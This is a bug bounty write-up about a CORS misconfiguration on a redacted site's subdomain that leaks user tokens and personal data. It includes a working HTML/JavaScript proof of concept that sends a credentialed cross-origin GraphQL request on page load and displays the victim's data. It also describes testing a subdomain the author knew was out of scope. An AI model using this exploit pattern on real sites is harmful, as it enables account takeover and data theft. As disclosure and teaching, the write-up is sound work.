Cors Misconfiguration : Steal victim token and PII leads to ATO

today i will talk about a bug i found it on July 2019 on Pvt program on HackerOne. the bug named “Cross Origin Resource Sharing Misconfiguration{CORS}”.

1-firstly what is CORS?

Cross-Origin Resource Sharing(CORS) is a mechanism that enables web browsers to perform cross-domain requests using the XMLHttpRequest API in a controlled manner. These cross-origin requests have an Origin header, that identifies the domain initiating the request. It defines the protocol to use between a web browser and a server to determine whether a cross-origin request is allowed.

2-Summary

After reviewing the Program Scope ,I concluded all subdomains are out of scope , just the main domain are In Scope.

3-Steps To Reproduce

Day one : i started hunting in the main domain www.redact.com, i understand how the program services works , also testing bugs but the site is more secure..Day two : i back to my testing again , when i viewed the Source code i noticed a subdomain in the code named core-plugins.redact.com
i know out of scope, but my mind tell test it.. 
the subdomain core-plugins.redact.com do not have a registration page . i can just login with my account on the main domain (SSO)after login i found this request

he printed PII info on response. Token,email,userinfo…etc 
then i noticed the “{Access Control Allow Credentials: true}” so i changed the origin , i deleted core-plugins.redact.com and i added https://evil.com. and it’s work !

Then i edited the graphql request to steal more info .

4-Exploition Code

 

<!DOCTYPE html>
<html>
<head>
<script>
function cors_exploit() {
 var xhttp = new XMLHttpRequest();
 xhttp.onreadystatechange = function() {
 if (this.readyState == 4 && this.status == 200) {
 document.getElementById(“demo”).innerHTML = alert(this.responseText);
 }
};

xhttp.open(“GET”, “https://core-plugins.redact.com/graphql?app=web&query=query%20App%20{customer%20{id,...F2}}%20fragment%20F0%20on%20Customer%20{is_premier,is_premier_parent,premier_permissions,username,user_type,full_name,organization_id,customer_id,hostname,token,id}%20fragment%20F1%20on%20Customer%20{premier_permissions,is_premier_parent,id}%20fragment%20F2%20on%20Customer%20{username,full_name,email,is_admin,id,...F0,...F1}", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</head>
<body onload=cors_exploit()>
<center>
<h2>Exploiting CORS Vulnerability </h2>
<h3>Extract SID</h3><div id=cors>
<button type=”button” onclick=cors_exploit()> Exploit</button>
</div>
</body>
</html>

 

 

Then i uploaded it to my website www.mysite.com/cors.html and it’s work the Data was printed!!

 

{ “data”: { “customer”: { “id”: “u285728853”, “username”: “storedthings133776”, “full_name”: null,
“email”: “storedthings1337@gmail.com”, “is_admin”: false, “is_premier”: false, 
“is_premier_parent”: false, “premier_permissions”: [], “user_type”: “core user”, 
“organization_id”: null, “customer_id”: “285728853”,“hostname”: “core-plugins.redact.com”,
“token”: “1/eyJjbGllbnRfaWQiOiI3YTE*****************” } }, “extensions”: {} }

 

5-The Token

 

The attacker could Access to the victim accounts through the token And perform any actions behalf the victim and view other Endpoints in API

 

Timeline

Nov 19th : Report Sent

Nov 20th: Triaged

Nov 20th: rewarded

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

That’s all, thankyou very much for reading it till the last. Hope you would have enjoyed it.Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters